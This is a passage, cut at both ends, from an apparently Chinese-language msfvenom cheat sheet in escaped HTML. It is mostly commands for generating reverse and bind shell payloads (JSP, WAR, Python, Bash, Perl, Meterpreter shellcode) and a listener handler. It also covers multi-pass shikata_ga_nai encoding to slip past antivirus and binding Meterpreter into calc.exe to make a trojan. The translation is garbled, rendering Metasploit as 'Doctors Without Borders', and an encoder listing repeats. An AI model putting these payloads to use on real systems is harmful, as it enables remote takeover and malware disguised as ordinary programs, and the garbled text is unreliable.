    msfvenom -p java\/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp<\/p>\n\n\n\n

    8.WAR:<\/p>\n\n\n\n

    msfvenom -p java\/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.wa<\/p>\n\n\n\n

    Scripting Payloads\uff1a<\/p>\n\n\n\n

    9.Python:<\/p>\n\n\n\n

    msfvenom -p cmd\/unix\/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py<\/p>\n\n\n\n

    10.Bash:<\/p>\n\n\n\n

    msfvenom -p cmd\/unix\/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh<\/p>\n\n\n\n

    11.Perl:<\/p>\n\n\n\n

    msfvenom -p cmd\/unix\/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl<\/p>\n\n\n\n

    Shellcode\uff1a<\/p>\n\n\n\n

    12.Linux Based Shellcode:<\/p>\n\n\n\n

    msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language><\/p>\n\n\n\n

    13.Windows Based Shellcode:<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language><\/p>\n\n\n\n

    14.Mac Based Shellcode:<\/p>\n\n\n\n

    msfvenom -p osx\/x86\/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language><\/p>\n\n\n\n

    15.Handlers\uff1a<\/p>\n\n\n\n

    use exploit\/multi\/handler<\/p>\n\n\n\n

       set PAYLOAD <Payload name><\/p>\n\n\n\n

       set LHOST <LHOST value><\/p>\n\n\n\n

       set LPORT <LPORT value><\/p>\n\n\n\n

       set ExitOnSession false<\/p>\n\n\n\n

       exploit -j -z<\/p>\n\n\n\n

    5.\u751f\u6210\u6709\u6548\u8f7d\u8377\u683c\u5f0f\u8bf4\u660e<\/p>\n\n\n\n

    \u751f\u6210\u4e0d\u7ecf\u8fc7\u7f16\u7801\u7684\u666e\u901a\u51c0\u8377\uff08\u4e0d\u7f16\u7801 – >\u751f\u6210\u5185\u5bb9\u56fa\u5b9a – >\u76f4\u63a5\u88ab\u6740\uff09<\/p>\n\n\n\n

    #\u683c\u5f0f<\/p>\n\n\n\n

    msfvenom -p <payload> <payload options> -f <format> -o <path><\/p>\n\n\n\n

    #\u5b9e\u4f8b<\/p>\n\n\n\n

    msfvenom \u2013p windows\/meterpreter\/reverse_tcp \u2013f c \u2013o 1.c<\/p>\n\n\n\n

    \u7ecf\u8fc7\u7f16\u7801\u5668\u5904\u7406\u540e\u751f\u6210\u7684\u6709\u6548\u8f7d\u8377<\/p>\n\n\n\n

    #\u683c\u5f0f<\/p>\n\n\n\n

    msfvenom -p <payload> -e <encoder > -i <encoder times> -n <nopsled> -f <format> -o <path><\/p>\n\n\n\n

    #\u5b9e\u4f8b<\/p>\n\n\n\n

    msfvenom \u2013p windows\/meterpreter\/reverse_tcp \u2013i 3 \u2013e x86\/shikata_ga_nai \u2013f exe \u2013o C:\\back.exe<\/p>\n\n\n\n

    \u6346\u7ed1\u5230\u6b63\u5e38\u6587\u4ef6\u540e\u751f\u6210\u6709\u6548\u8f7d\u8377\uff08\u6682\u672a\u6d4b\u8bd5\u662f\u5426\u53ef\u52a0-e\u53c2\u6570\uff09<\/p>\n\n\n\n

    Msfvenom \u2013p windows\/meterpreter\/reverse_tcp \u2013platform windows \u2013a x86 \u2013x C:\\calc.exe \u2013k \u2013f exe \u2013o C:\\shell.exe<\/p>\n\n\n\n

    -p [\u6307\u5b9a\u653b\u51fb\u8f7d\u8377\u540d\u79f0]<\/p>\n\n\n\n

    \u751f\u6210\u6709\u6548\u8d1f\u8377\u81f3\u5c11\u9700\u6307\u5b9a-p\u548c-f<\/p>\n\n\n\n

    \u9664\u4e86\u81ea\u5e26\u7684\u90a3\u4e9b\u6709\u6548\u8f7d\u8377\u5916
    -p -\u53ef\u6307\u5b9a\u81ea\u5b9a\u4e49\u7684\u6709\u6548\u8f7d\u8377\uff0c\u5982\uff1a<\/p>\n\n\n\n

    cat payload_file.bin | msfvenom -p – -a x86 –platform win -e x86\/shikata_ga_nai -f raw<\/p>\n\n\n\n

    #\u6682\u672a\u6d4b\u8bd5<\/p>\n\n\n\n

    cat 1.exe | msfvenom -p – -a x86 –platform win -e x86\/shikata_ga_nai -f exe -o 2.exe<\/p>\n\n\n\n

    -f [\u6307\u5b9a\u6709\u6548\u8f7d\u8377\u7684\u8f93\u51fa\u683c\u5f0f]<\/p>\n\n\n\n

    \u6309\u9700\u8981\u7684\u683c\u5f0f\u8fdb\u884c\u8f93\u51fa\uff1a
    \u5341\u516d\u8fdb\u5236\u5341\u516d\u8fdb\u5236\u5f62\u5f0f\u7f16\u7801\\x0a
    \u5982\u679c\u7528\u87d2\u5199\u5229\u7528\uff0c\u7528-f python\u5f97\u5230\u87d2\u4ee3\u7801\u3002
    \u5982\u679c\u7528\u87d2\u5199\u5229\u7528\uff0c\u7528-f c\u5f97\u5230\u00c7\u4ee3\u7801\u3002<\/p>\n\n\n\n

    \u751f\u6210\u4e00\u4e2aEXE\u683c\u5f0f\u7684\u6709\u6548\u8f7d\u8377\uff0c\u5982\uff1a
    msfvenom -p windows\/meterpreter\/bind_tcp -f exe<\/p>\n\n\n\n

    \u65e0\u56fd\u754c\u533b\u751f\u652f\u6301\u7684\u8f93\u51fa\u683c\u5f0f<\/p>\n\n\n\n

    msfvenom –help-formats<\/p>\n\n\n\n

    Executable formats<\/p>\n\n\n\n

        asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war<\/p>\n\n\n\n

    Transform formats<\/p>\n\n\n\n

        bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript<\/p>\n\n\n\n

    – \u4e00\u4e2ax64<\/p>\n\n\n\n

    -a x86 
    -a x86_64<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/bind_tcp –help-platform<\/p>\n\n\n\n

    Platforms<\/p>\n\n\n\n

        aix, android, bsd, bsdi, cisco, firefox, freebsd, hardware, hpux, irix, java, javascript, linux, mainframe, multi, netbsd, netware, nodejs, openbsd, osx, php, python, ruby, solaris, unix, windows<\/p>\n\n\n\n

    -a\u4e0d\u6307\u5b9a\u4e5f\u53ef\u4ee5\uff0c\u53ef\u5728-p\u540e\u7684\u6709\u6548\u8f7d\u8377\u540d\u79f0\u4e2d\u660e\u786e\u6307\u5b9a\u7684\u5efa\u7b51\uff0c\u5982\uff1a<\/p>\n\n\n\n

    msfvenom -p linux\/x86\/exec CMD=\/bin\/sh<\/p>\n\n\n\n

    \u6b64\u6709\u6548\u8f7d\u8377\u6307\u5b9a\u4e86\u53c2\u6570CMD 
    \u67e5\u770b\u67d0\u4e2a\u6709\u6548\u8f7d\u8377\u5177\u4f53\u9700\u8981\u54ea\u4e9b\u53c2\u6570\uff08\u5fc5\u9700\u662f\u662f\u5219\u5fc5\u9700\u8be5\u53c2\u6570\uff09
    msfvenom -p linux\/x86\/exec –payload-options<\/p>\n\n\n\n

    \u5bf9\u6709\u6548\u8f7d\u8377\u8fdb\u884c\u7f16\u7801<\/p>\n\n\n\n

    1.\u89c4\u907f\u7279\u6b8a\u5b57\u7b26-b’\/ x00\u4e00\u4e2a\u7279\u6b8a\u5b57\u7b26\u5217\u8868’<\/p>\n\n\n\n

    \u65e0\u56fd\u754c\u533b\u751f\u4f1a\u81ea\u52a8\u627e\u4e00\u4e2a\u5408\u9002\u7684\u7f16\u7801\u5668\u89c4\u907f\u6709\u6548\u8f7d\u8377\u4e2d\u7684\u8fd9\u4e9b\u201c\u574f\u5b57\u7b26\u201d\uff1a
    msfvenom -p windows\/meterpreter\/bind_tcp -b ‘\\x00’ -f raw<\/p>\n\n\n\n

    Found 10 compatible encoders<\/p>\n\n\n\n

    Attempting to encode payload with 1 iterations of x86\/shikata_ga_nai<\/p>\n\n\n\n

    \u4e0d\u540c\u7684\u51fd\u6570\uff0c\u6709\u4e0d\u540c\u7684\u89c4\u907f\u5b57\u7b26\uff1a
    \u5982\u83b7\u53d6\u9700\u8981\u5c31\u907f\u514d\/x0a
    \u5982scanf\u51fd\u6570\u66f4\u4e25\u683c\uff0c\u7a7a\u767d\u4e0d\u5141\u8bb8\u7b26
    \u5982\u4ea7\u751f\u4e00\u6bb5\u9ad8\u7ba1\u7684shellcode\u7684<\/p>\n\n\n\n

    2.\u7528-e\u9009\u9879\u6307\u5b9a\u7f16\u7801\u5668\u7684\u7f16\u7801\u5668\uff0c\u5982\uff1a<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -f raw<\/p>\n\n\n\n

    \u9ed8\u8ba4\u7684\u8f93\u51fa\u683c\u5f0f\u662f\u539f\u59cb\u7684\uff0c\u76f4\u63a5\u8f93\u51fa\u6709\u6548\u8f7d\u8377\u7684\u5b57\u7b26\uff08\u542b\u4e71\u7801\uff09\uff0c\u5e38\u52a0\u53c2\u6570-o\u5199\u5230\u6587\u4ef6\u4e2d\u3002<\/p>\n\n\n\n

    3.\u4f7f\u7528-i\u8fdb\u884c\u9009\u9879\u5bf9\u8bdd\u591a\u6b21\u7f16\u7801
    \u8fed\u4ee3\u7f16\u7801\u4e5f\u8bb8\u4f1a\u6709\u89c4\u907f\u6740\u6bd2\u8f6f\u4ef6\u7684\u4f5c\u7528\u82f1\u6587\uff0c\u4f46\u8fd9\u4e0d\u662f\u771f\u6b63\u7684\u514d\u6740\u3002<\/p>\n\n\n\n

    \u8fed\u4ee3\u7f16\u7801\u4f8b\u5b50\uff1a
    msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -i 3<\/p>\n\n\n\n

    \u65e0\u56fd\u754c\u533b\u751f\u7ec4\u7ec7\u4e2d\u6240\u6709\u7684\u7f16\u7801\u5668\uff1a<\/p>\n\n\n\n

    msfvenom -l encoders<\/p>\n\n\n\n

    Framework Encoders<\/p>\n\n\n\n

    ==================<\/p>\n\n\n\n

        Name                          Rank       Description<\/p>\n\n\n\n

        —-                          —-       ———–<\/p>\n\n\n\n

        cmd\/echo                      good       Echo Command Encoder<\/p>\n\n\n\n

    cmd\/generic_shmanual     Generic Shell Variable Substitution Command Encoder<\/p>\n\n\n\n

        cmd\/ifs                       low        Generic ${IFS} Substitution Command Encoder<\/p>\n\n\n\n

        cmd\/perl                      normal     Perl Command Encoder<\/p>\n\n\n\n

        cmd\/powershell_base64         excellent  Powershell Base64 Command Encoder<\/p>\n\n\n\n

    cmd\/printf_php_mqmanual     printf(1) via PHP magic_quotes Utility Command Encoder<\/p>\n\n\n\n

    generic\/eicarmanual     The EICAR Encoder<\/p>\n\n\n\n

    generic\/none                  normal     The “none” Encoder<\/p>\n\n\n\n

    mipsbe\/byte_xorinormal     Byte XORi Encoder<\/p>\n\n\n\n

    mipsbe\/longxornormal     XOR Encoder<\/p>\n\n\n\n

    mipsle\/byte_xorinormal     Byte XORi Encoder<\/p>\n\n\n\n

    mipsle\/longxor                normal     XOR Encoder<\/p>\n\n\n\n

        php\/base64                    great      PHP Base64 Encoder<\/p>\n\n\n\n

    ppc\/longxornormal     PPC LongXOR Encoder<\/p>\n\n\n\n

    ppc\/longxor_tagnormal     PPC LongXOR Encoder<\/p>\n\n\n\n

    sparc\/longxor_tag             normalSPARC DWORD XOR Encoder<\/p>\n\n\n\n

        x64\/xor                       normal     XOR Encoder<\/p>\n\n\n\n

    x64\/zutto_dekirumanual     Zutto Dekiru<\/p>\n\n\n\n

    x86\/add_submanual     Add\/Sub Encoder<\/p>\n\n\n\n

    x86\/alpha_mixedlow        Alpha2 Alphanumeric Mixedcase Encoder<\/p>\n\n\n\n

    x86\/alpha_upperlow        Alpha2 Alphanumeric Uppercase Encoder<\/p>\n\n\n\n

    x86\/avoid_underscore_tolowermanual     Avoid underscore\/tolower<\/p>\n\n\n\n

    x86\/avoid_utf8_tolowermanual     Avoid UTF8\/tolower<\/p>\n\n\n\n

        x86\/bloxor                    manual     BloXor – A Metamorphic Block Based XOR Encoder<\/p>\n\n\n\n

    x86\/bmp_polyglotmanual     BMP Polyglot<\/p>\n\n\n\n

    x86\/call4_dword_xornormal     Call+4 Dword XOR Encoder<\/p>\n\n\n\n

    x86\/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder<\/p>\n\n\n\n

    x86\/context_statmanual     stat(2)-based Context Keyed Payload Encoder<\/p>\n\n\n\n

    x86\/context_timemanual     time(2)-based Context Keyed Payload Encoder<\/p>\n\n\n\n

    x86\/countdown                 normal     Single-byte XOR Countdown Encoder<\/p>\n\n\n\n

    x86\/fnstenv_movnormal     Variable-length Fnstenv\/mov Dword XOR Encoder<\/p>\n\n\n\n

    x86\/jmp_call_additivenormal     Jump\/Call XOR Additive Feedback Encoder<\/p>\n\n\n\n

    x86\/nonalpha                  low        Non-Alpha Encoder<\/p>\n\n\n\n

    x86\/nonupperlow        Non-Upper Encoder<\/p>\n\n\n\n

    x86\/opt_submanual     Sub Encoder (optimised)<\/p>\n\n\n\n

    x86\/servicemanual     Register Service<\/p>\n\n\n\n

    x86\/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder<\/p>\n\n\n\n

    x86\/single_static_bitmanual     Single Static Bit<\/p>\n\n\n\n

    x86\/unicode_mixedmanual     Alpha2 Alphanumeric Unicode Mixedcase Encoder<\/p>\n\n\n\n

    x86\/unicode_uppermanual     Alpha2 Alphanumeric Unicode Uppercase Encoder<\/p>\n\n\n\n

    -x\u6307\u5b9a\u4e00\u4e2a\u6a21\u677f\u6587\u4ef6\uff08\u201c\u6346\u7ed1\u201dpayload\u5230\u8fd9\u4e2a\u6b63\u5e38\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff09<\/p>\n\n\n\n

    msfvenom\u4f7f\u7528\u7684\u6a21\u677f\u6587\u4ef6\u4fdd\u5b58\u5728\u76ee\u5f55msf\/data\/templates<\/p>\n\n\n\n

    -x calc.exe 
    \u6346\u7ed1\u6709\u6548\u8d1f\u8f7d\u5230\u6b63\u5e38\u6587\u4ef6\uff08\u6a21\u677f\u6587\u4ef6=\u5bbf\u4e3b\u6587\u4ef6=\u81ea\u5b9a\u4e49\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff09<\/p>\n\n\n\n

    \u4f7f\u7528-x\u9009\u9879\u6307\u5b9a\u4f60\u81ea\u5df1\u7684\u6a21\u677f\u6587\u4ef6\uff08\u5982EXE\u7b49\uff09\uff0c\u5982\uff1a
    \u4f7f\u7528\u7a97\u6237\u4e0b\u7684CALC.EXE\u4f5c\u4e3a\u6a21\u677f\u6587\u4ef6\uff0c\u751f\u6210\u6709\u6548\u8f7d\u8377\uff1a<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/bind_tcp -x calc.exe -f exe > new.exe<\/p>\n\n\n\n

    \u6ce8\u610f\uff0c\u5728win x64\u4e0b\u4f7f\u7528\u81ea\u5b9a\u4e49\u7684x64\u7684\u6a21\u677f\u6587\u4ef6\uff08\u5982exe\u7b49\uff09\u521b\u5efax64\u7684\u6709\u6548\u8f7d\u8377\u65f6\uff0c\u8f93\u51fa\u683c\u5f0f\u5fc5\u987b\u8981\u5199-f exe-only\u800c\u4e0d\u80fd\u5199-f exe
    \uff08\u8bf7\u6ce8\u610f\uff1a\u5982\u679c\u60a8\u60f3\u521b\u5efa\u4e00\u4e2a\u5e26\u6709\u81ea\u5b9a\u4e49Windows\u7684x64\u81ea\u5b9a\u4e49\u6a21\u677f\uff0c\u7136\u540e\u800c\u4e0d\u662fexe\u683c\u5f0f\uff0c\u60a8\u5e94\u8be5\u4f7f\u7528exe-only \ud83d\ude42<\/p>\n\n\n\n

    msfvenom -p windows\/x64\/meterpreter\/bind_tcp -x \/tmp\/templates\/64_calc.exe -f exe-only > \/tmp\/fake_64_calc.exe<\/p>\n\n\n\n

    -x\u9009\u9879\u7ecf\u5e38\u548c-k\u9009\u9879\u4e00\u8d77\u7528\uff0c\u5b83\u5141\u8bb8\u60a8\u4ece\u6a21\u677f\u4e2d\u5c06\u6709\u6548\u8f7d\u8377\u4f5c\u4e3a\u65b0\u7684\u7ebf\u7a0b\u8fd0\u884c\u3002\u4f46\u662f\u5b83\u76ee\u524d\u53ea\u652f\u6301\u8f83\u8001\u7684\u7cfb\u7edf\uff0c\u5982x86 Windows XP\u3002
    \uff08-x\u6807\u5fd7\u901a\u5e38\u4e0e-k\u6807\u5fd7\u914d\u5bf9\uff0c\u8fd9\u4f7f\u60a8\u53ef\u4ee5\u5c06\u6a21\u677f\u4e2d\u7684\u6709\u6548\u8d1f\u8f7d\u4f5c\u4e3a\u65b0\u7ebf\u7a0b\u8fd0\u884c\u3002\u4f46\u662f\uff0c\u76ee\u524d\u8fd9\u53ea\u9002\u7528\u4e8e\u8f83\u65e7\u7684Windows\u673a\u5668\uff0c\u4f8b\u5982x86 Windows XP\u3002\uff09<\/p>\n\n\n\n

    6.payload\u52a0\u7f16\u7801<\/p>\n\n\n\n

    \u547d\u4ee4\u683c\u5f0f\uff1a<\/p>\n\n\n\n

    msfvenom -p <payload> <payload options> -a <arch> –platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path><\/p>\n\n\n\n

    \u5e38\u7528\u7f16\u7801\uff1a<\/p>\n\n\n\n

    x86\/shikata_ga_nai<\/p>\n\n\n\n

    cmd\/powershell_base64<\/p>\n\n\n\n

    \u4f8b\u5b50\uff1a<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -i 3 -f exe > 1.exe<\/p>\n\n\n\n

    \u5982\u679c\u4f60\u4f7f\u7528\u4e86-b\u9009\u9879\uff08\u8bbe\u5b9a\u4e86\u89c4\u907f\u5b57\u7b26\u96c6\uff09\uff0c\u4f1a\u81ea\u52a8\u8c03\u7528\u7f16\u7801\u5668\u3002
    \u5176\u4ed6\u60c5\u51b5\u4e0b\uff0c\u4f60\u9700\u8981\u4f7f\u7528-e\u9009\u9879\u6765\u4f7f\u7528\u7f16\u7801\u6a21\u5757\uff0c\u4f8b\u5982\uff1a<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -f raw<\/p>\n\n\n\n

    \u53ef\u4ee5\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\uff0c\u6765\u67e5\u770b\u53ef\u7528\u7684\u7f16\u7801\u5668<\/p>\n\n\n\n

    msfvenom -l encoders<\/p>\n\n\n\n

    \u4f60\u4e5f\u53ef\u4ee5\u4f7f\u7528-i\u9009\u9879\u8fdb\u884c\u591a\u6b21\u7f16\u7801\u3002\u67d0\u4e9b\u60c5\u51b5\u4e0b\uff0c\u8fed\u4ee3\u7f16\u7801\u53ef\u4ee5\u8d77\u5230\u89c4\u907f\u6740\u6bd2\u8f6f\u4ef6\u7684\u4f5c\u7528\uff0c\u4f46\u4f60\u9700\u8981\u77e5\u9053\uff0c\u7f16\u7801\u5e76\u6ca1\u6709\u4f7f\u7528\u4e00\u4e2a\u771f\u6b63\u610f\u4e49\u4e0a\u7684AV\u89c4\u907f\u65b9\u6848\u3002
    \u53ef\u4ee5\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u8fdb\u884c\u8fed\u4ee3\u7f16\u7801\uff1a<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -i 3<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/bind_tcp -b ‘\\x00’ -f raw<\/p>\n\n\n\n

    \uff081\uff09\u89c4\u907f\u7279\u6b8a\u5b57\u7b26 -b ‘\/x00\u4e00\u4e2a\u7279\u6b8a\u5b57\u7b26\u5217\u8868’                                        <\/p>\n\n\n\n

    \u4f7f\u7528-b\u9009\u9879\u610f\u5473\u7740\u5728\u751f\u6210payload\u7684\u65f6\u5019\u5bf9\u67d0\u4e9b\u5b57\u7b26\u8fdb\u884c\u89c4\u907f\u3002\u5f53\u4f60\u4f7f\u7528\u8fd9\u4e2a\u9009\u9879\u7684\u65f6\u5019\uff0cmsfvenom\u4f1a\u81ea\u52a8\u7684\u4f7f\u7528\u5408\u9002\u7684\u7f16\u7801\u5668\u5bf9payload\u8fdb\u884c\u7f16\u7801\uff0c\u6bd4\u5982\uff1a
    msfvenom -p windows\/meterpreter\/bind_tcp -b ‘\\x00’ -f raw<\/p>\n\n\n\n

    \u4e0d\u540c\u7684\u51fd\u6570\uff0c\u6709\u4e0d\u540c\u7684\u89c4\u907f\u5b57\u7b26\uff1a
    \u5982gets\u5c31\u9700\u8981\u907f\u514d\/x0a
    \u5982scanf\u66f4\u4e25\u683c\uff0c\u4e0d\u5141\u8bb8\u7a7a\u767d\u7b26
    \u5982\u4ea7\u751f\u4e00\u6bb5exec\u7684shellcode<\/p>\n\n\n\n

    \uff082\uff09\u7528-e\u9009\u9879\u6307\u5b9a\u7f16\u7801\u5668encoder<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -f raw<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 -e x86\/shikata_ga_nai -i 3 -f exe -o encoder.exe<\/p>\n\n\n\n

    \u9ed8\u8ba4\u7684\u8f93\u51fa\u683c\u5f0f\u662fraw\uff0c\u76f4\u63a5\u8f93\u51fapayload\u7684\u5b57\u7b26\uff08\u542b\u4e71\u7801\uff09\uff0c\u5e38\u52a0\u53c2\u6570-o\u5199\u5230\u6587\u4ef6\u4e2d\u3002<\/p>\n\n\n\n

    (3)\u4f7f\u7528-i\u9009\u9879\u8fdb\u884c\u591a\u6b21\u7f16\u7801
    \u8fed\u4ee3\u7f16\u7801\u4e5f\u8bb8\u4f1a\u6709\u89c4\u907f\u6740\u6bd2\u8f6f\u4ef6\u7684\u4f5c\u7528\uff0c\u4f46\u8fd9\u4e0d\u662f\u771f\u6b63\u7684\u514d\u6740\u3002<\/p>\n\n\n\n

    \u8fed\u4ee3\u7f16\u7801 \u4f8b\u5b50\uff1a
    msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -i 3<\/p>\n\n\n\n

    (4)msf\u4e2d\u6240\u6709\u7684\u7f16\u7801\u5668<\/p>\n\n\n\n

    msfvenom -l encoders<\/p>\n\n\n\n

    Framework Encoders<\/p>\n\n\n\n

    ==================<\/p>\n\n\n\n

        Name                          Rank       Description<\/p>\n\n\n\n

        —-                          —-       ———–<\/p>\n\n\n\n

        cmd\/echo                      good       Echo Command Encoder<\/p>\n\n\n\n

    cmd\/generic_sh                manual     Generic Shell Variable Substitution Command Encoder<\/p>\n\n\n\n

        cmd\/ifs                       low        Generic ${IFS} Substitution Command Encoder<\/p>\n\n\n\n

        cmd\/perl                      normal     Perl Command Encoder<\/p>\n\n\n\n

    cmd\/powershell_base64excellent  Powershell Base64 Command Encoder<\/p>\n\n\n\n

    cmd\/printf_php_mqmanual     printf(1) via PHP magic_quotes Utility Command Encoder<\/p>\n\n\n\n

    generic\/eicarmanual     The EICAR Encoder<\/p>\n\n\n\n

    generic\/nonenormal     The “none” Encoder<\/p>\n\n\n\n

    mipsbe\/byte_xorinormal     Byte XORi Encoder<\/p>\n\n\n\n

    mipsbe\/longxornormal     XOR Encoder<\/p>\n\n\n\n

    mipsle\/byte_xorinormal     Byte XORi Encoder<\/p>\n\n\n\n

    mipsle\/longxornormal     XOR Encoder<\/p>\n\n\n\n

        php\/base64                    great      PHP Base64 Encoder<\/p>\n\n\n\n

    ppc\/longxornormal     PPC LongXOR Encoder<\/p>\n\n\n\n

    ppc\/longxor_tagnormal     PPC LongXOR Encoder<\/p>\n\n\n\n

    sparc\/longxor_tagnormal     SPARC DWORD XOR Encoder<\/p>\n\n\n\n

        x64\/xor                       normal     XOR Encoder<\/p>\n\n\n\n

    x64\/zutto_dekirumanual     Zutto Dekiru<\/p>\n\n\n\n

    x86\/add_submanual     Add\/Sub Encoder<\/p>\n\n\n\n

    x86\/alpha_mixedlow        Alpha2 Alphanumeric Mixedcase Encoder<\/p>\n\n\n\n

    x86\/alpha_upperlow        Alpha2 Alphanumeric Uppercase Encoder<\/p>\n\n\n\n

    x86\/avoid_underscore_tolowermanual     Avoid underscore\/tolower<\/p>\n\n\n\n

    x86\/avoid_utf8_tolowermanual     Avoid UTF8\/tolower<\/p>\n\n\n\n

        x86\/bloxor                    manual     BloXor – A Metamorphic Block Based XOR Encoder<\/p>\n\n\n\n

    x86\/bmp_polyglotmanual     BMP Polyglot<\/p>\n\n\n\n

    x86\/call4_dword_xornormal     Call+4 Dword XOR Encoder<\/p>\n\n\n\n

    x86\/context_cpuidmanual     CPUID-based Context Keyed Payload Encoder<\/p>\n\n\n\n

    x86\/context_statmanual     stat(2)-based Context Keyed Payload Encoder<\/p>\n\n\n\n

    x86\/context_timemanual     time(2)-based Context Keyed Payload Encoder<\/p>\n\n\n\n

    x86\/countdownnormal     Single-byte XOR Countdown Encoder<\/p>\n\n\n\n

    x86\/fnstenv_movnormal     Variable-length Fnstenv\/mov Dword XOR Encoder<\/p>\n\n\n\n

    x86\/jmp_call_additivenormal     Jump\/Call XOR Additive Feedback Encoder<\/p>\n\n\n\n

    x86\/nonalphalow        Non-Alpha Encoder<\/p>\n\n\n\n

        x86\/nonupper                  low        Non-Upper Encoder<\/p>\n\n\n\n

    x86\/opt_submanual     Sub Encoder (optimised)<\/p>\n\n\n\n

    x86\/servicemanual     Register Service<\/p>\n\n\n\n

    x86\/shikata_ga_naiexcellent  Polymorphic XOR Additive Feedback Encoder<\/p>\n\n\n\n

    x86\/single_static_bitmanual     Single Static Bit<\/p>\n\n\n\n

    x86\/unicode_mixedmanual     Alpha2 Alphanumeric Unicode Mixedcase Encoder<\/p>\n\n\n\n

        x86\/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder<\/p>\n\n\n\n

    (5)\u4f7f\u7528\u81ea\u5b9a\u4e49\u53ef\u6267\u884c\u6587\u4ef6\u6a21\u677f<\/p>\n\n\n\n

    -x \u6307\u5b9a\u4e00\u4e2a\u6a21\u677f\u6587\u4ef6\uff08\u201c\u6346\u7ed1\u201cpayload\u5230\u8fd9\u4e2a\u6b63\u5e38\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff09<\/p>\n\n\n\n

    \u9ed8\u8ba4\u7684msfvenom\u4f7f\u7528\u7684\u6a21\u677f\u6587\u4ef6\u4fdd\u5b58\u5728msf\/data\/templates\u76ee\u5f55\u4e2d\uff0c\u5982\u679c\u4f60\u60f3\u4f7f\u7528\u4f60\u81ea\u5df1\u7684\u6a21\u677f\u6587\u4ef6\uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528-x\u9009\u9879\u6765\u6307\u5b9a\uff0c\u6bd4\u5982\uff1a
    \u6346\u7ed1payload\u5230 \u6b63\u5e38\u6587\u4ef6\uff08\u6a21\u677f\u6587\u4ef6=\u5bbf\u4e3b\u6587\u4ef6=\u81ea\u5b9a\u4e49\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff09\uff0c\u4f7f\u7528-x\u9009\u9879\u6307\u5b9a\u4f60\u81ea\u5df1\u7684\u6a21\u677f\u6587\u4ef6\uff08\u5982exe\u7b49\uff09\uff0c\u5982\uff1a\u4f7f\u7528windows\u4e0b\u7684calc.exe\u4f5c\u4e3a\u6a21\u677f\u6587\u4ef6,\u751f\u6210payload\uff1a<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/bind_tcp -x calc.exe -f exe > new.exe<\/p>\n\n\n\n

    \u8fd9\u4e2a\u547d\u4ee4\u5c06\u4f7f\u7528windows\u4e0b\u8ba1\u7b97\u5668\u7a0b\u5e8f\uff08calc.exe\uff09\u4f5c\u4e3a\u53ef\u6267\u884c\u6587\u4ef6\u7684\u6a21\u677f\u751f\u6210payload\u3002<\/p>\n\n\n\n

    \u6ce8\u610f\uff0c\u5728win x64\u4e0b\u4f7f\u7528\u81ea\u5b9a\u4e49\u7684x64\u7684\u6a21\u677f\u6587\u4ef6\uff08\u5982exe\u7b49\uff09\u521b\u5efax64\u7684payload\u65f6\uff0c\u8f93\u51fa\u683c\u5f0f\u5fc5\u987b\u8981\u5199-f exe-only\u800c\u4e0d\u80fd\u5199-f exe
    msfvenom -p windows\/x64\/meterpreter\/bind_tcp -x \/tmp\/templates\/64_calc.exe -f exe-only > \/tmp\/fake_64_calc.exe<\/p>\n\n\n\n

    -x\u9009\u9879\u7ecf\u5e38\u548c-k\u9009\u9879\u4e00\u8d77\u7528\uff0c\u5b83\u5141\u8bb8\u60a8\u4ece\u6a21\u677f\u4e2d\u5c06payload\u4f5c\u4e3a\u65b0\u7684\u7ebf\u7a0b\u8fd0\u884c\u3002\u4f46\u662f\u5b83\u76ee\u524d\u53ea\u652f\u6301\u8f83\u8001\u7684\u7cfb\u7edf\uff0c\u5982x86 Windows XP.<\/p>\n\n\n\n

    (6)How to chain msfvenom output<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86\/shikata_ga_nai -i 5 | \\<\/p>\n\n\n\n

